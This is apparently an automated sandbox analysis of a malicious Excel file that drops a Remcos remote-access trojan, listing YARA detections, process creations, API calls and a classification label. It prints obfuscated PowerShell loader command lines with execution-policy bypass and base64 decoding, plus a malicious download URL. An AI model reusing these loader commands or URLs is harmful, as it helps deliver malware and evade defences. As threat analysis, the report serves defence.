                    Source: Yara matchFile source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041CA73 SystemParametersInfoW,30_2_0041CA73

                    System Summary

                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3112, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: QPS-36477.xlsOLE: Microsoft Excel 2007+
                    Source: 58430000.0.drOLE: Microsoft Excel 2007+
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\newthingtobeonlinefor[1].hta
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'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'+[ChaR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,21_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00401806 NtdllDefWindowProc_W,21_2_00401806
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004018C0 NtdllDefWindowProc_W,21_2_004018C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004016FD NtdllDefWindowProc_A,23_2_004016FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004017B7 NtdllDefWindowProc_A,23_2_004017B7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402CAC NtdllDefWindowProc_A,24_2_00402CAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402D66 NtdllDefWindowProc_A,24_2_00402D66
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,30_2_004167EF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A73023_2_0044A730
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004398D823_2_004398D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_004498E023_2_004498E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0044A88623_2_0044A886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0043DA0923_2_0043DA09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00438D5E23_2_00438D5E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00449ED023_2_00449ED0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_0041FE8323_2_0041FE83
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_00430F5423_2_00430F54
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004050C224_2_004050C2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004014AB24_2_004014AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040513324_2_00405133
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004051A424_2_004051A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040124624_2_00401246
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040CA4624_2_0040CA46
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040523524_2_00405235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_004032C824_2_004032C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_0040168924_2_00401689
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00402F6024_2_00402F60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043706A30_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041400530_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043E11C30_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004541D930_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004381E830_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041F18B30_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0044627030_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043E34B30_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004533AB30_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0042742E30_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043756630_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043E5A830_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004387F030_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043797E30_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_004339D730_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0044DA4930_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00427AD730_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0041DBF330_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00427C4030_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00437DB330_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00435EEB30_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_0043DEED30_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 30_2_00426E9F30_2_00426E9F
                    Source: QPS-36477.xlsOLE indicator, VBA macros: true
                    Source: QPS-36477.xlsStream path 'MBD001CA3FD/\x1Ole' : https://wrath.me/EhYykL'<{a;nUFXUq0NpmLtK8 5l-7h>aToWG4qamxy8gRPBfbrRRmg8Yr7jleepB0nvDhwOFy3FzbdBoq9Nlv7Oqgd7p6KV5bICezqWzXW02tDtIfkayOfD3Zqh3kOxiv33bXWibUWX9s"e&]g7CcwN#T[?=
                    Source: 58430000.0.drStream path 'MBD001CA3FD/\x1Ole' : https://wrath.me/EhYykL'<{a;nUFXUq0NpmLtK8 5l-7h>aToWG4qamxy8gRPBfbrRRmg8Yr7jleepB0nvDhwOFy3FzbdBoq9Nlv7Oqgd7p6KV5bICezqWzXW02tDtIfkayOfD3Zqh3kOxiv33bXWibUWX9s"e&]g7CcwN#T[?=
                    Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 30.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 29.2.powershell.exe.12a41af0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 30.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 14.2.powershell.exe.12b940b0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 29.2.powershell.exe.12a41af0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 14.2.powershell.exe.12b940b0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000001E.00000002.515176874.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000001D.00000002.532162114.000000001285E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000001D.00000002.532162114.000000001491D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3112, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3232, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 3784, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: RegAsm.exe PID: 4072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: bhv8392.tmp.21.drBinary or memory string: org.slneighbors
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winXLS@41/45@8/6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,21_2_004182CE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 24_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,24_2_00410DE1
